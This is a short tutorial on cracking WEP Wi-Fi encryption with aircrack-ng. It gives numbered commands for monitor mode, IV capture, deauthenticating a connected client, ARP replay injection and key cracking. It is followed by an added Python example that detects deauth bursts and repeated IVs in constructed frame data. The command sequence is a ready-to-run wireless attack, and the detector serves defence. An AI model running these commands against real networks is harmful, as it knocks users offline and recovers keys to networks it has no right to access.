BASIC WEP ATTACK 

 

Basic WEP Attack using aircrack-ng where you deauth a connected client.  Open authentication assumed.

 

0.   Put radio into monitor mode:

airmon-ng stop ath0; airmon-ng start wifi0;

 

1.    Start listening

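airodump-ng --ivs --bssid AP:AP:AP:AP:AP:AP --channel 11 --write dump ath0

where AP:AP:AP:AP:AP:AP is the MAC of the Access Point, dump is the name of the file that will contain the IVs (airodump-ng appends a sequence number and extension, so the first capture is written to dump-01.ivs)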

 

2.     Deauth the client

aireplay-ng --deauth 20 -a AP:AP:AP:AP:AP:AP -e ssid -c CC:CC:CC:CC:CC:CC ath0

where AP:AP:AP:AP:AP:AP is the MAC of the Access Point and CC:CC:CC:CC:CC:CC is the MAC of the client.  Hopefully the ARP count starts hopping.

 

3.    Do ARP replay (injection) to force the IV count

aireplay-ng --arpreplay -b AP:AP:AP:AP:AP:AP ath0

 

You may need to fakeauth, but the protocol above works great on the Eee under BackTrack 3.

 

4.    Crack

aircrack-ng dump-01.ivs
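
Seen from the defending side, steps 2 and 3 leave two distinctive traces on the air: a burst of deauthentication frames aimed at one client, and WEP data frames that repeat the same IV because a replayed frame is re-sent unchanged. The following is an added example, not part of the original page: a small detector run over constructed frame summaries. The record fields (ts, type, bssid, client, ta, iv), the MAC addresses and the thresholds are assumptions made for the illustration.

```python
from collections import defaultdict, deque

# Assumed thresholds for this example; tune them against your own baseline.
WINDOW_S = 5.0      # sliding window for counting deauth frames, in seconds
DEAUTH_BURST = 10   # deauths to one (BSSID, client) pair inside the window
IV_REPEATS = 50     # times one transmitter may reuse the same WEP IV

def detect(frames):
    """Scan frame summaries (sorted by 'ts') and return a sorted list of alerts."""
    deauths = defaultdict(deque)   # (bssid, client) -> timestamps in window
    iv_seen = defaultdict(int)     # (transmitter, iv) -> occurrences
    alerts = set()
    for f in frames:
        if f["type"] == "deauth":
            key = (f["bssid"], f["client"])
            q = deauths[key]
            q.append(f["ts"])
            while f["ts"] - q[0] > WINDOW_S:   # drop timestamps outside window
                q.popleft()
            if len(q) >= DEAUTH_BURST:
                alerts.add(("deauth-burst",) + key)
        elif f["type"] == "wep-data":
            # A replayed frame is re-sent byte for byte, so its IV never changes.
            key = (f["ta"], f["iv"])
            iv_seen[key] += 1
            if iv_seen[key] >= IV_REPEATS:
                alerts.add(("iv-replay", f["bssid"], f["ta"]))
    return sorted(alerts)

AP, STA = "02:00:00:00:00:01", "02:00:00:00:00:02"   # constructed MACs

def sample_frames():
    """Constructed sensor output: normal traffic, then a deauth burst and a replay."""
    frames = [{"ts": i * 0.05, "type": "wep-data", "bssid": AP, "ta": STA, "iv": i}
              for i in range(200)]                       # fresh IV per frame
    frames.append({"ts": 10.0, "type": "deauth", "bssid": AP, "client": STA})
    frames += [{"ts": 20.0 + i * 0.05, "type": "deauth", "bssid": AP, "client": STA}
               for i in range(20)]                       # burst of 20 deauths
    frames += [{"ts": 22.0 + i * 0.002, "type": "wep-data", "bssid": AP, "ta": STA,
                "iv": 0xABCDEF} for i in range(300)]     # one IV, 300 times
    return frames

if __name__ == "__main__":
    for alert in detect(sample_frames()):
        print(alert)
```

The IV counter here is not windowed, so on a long capture a busy client that wraps the 24-bit IV space should be counted per time window instead.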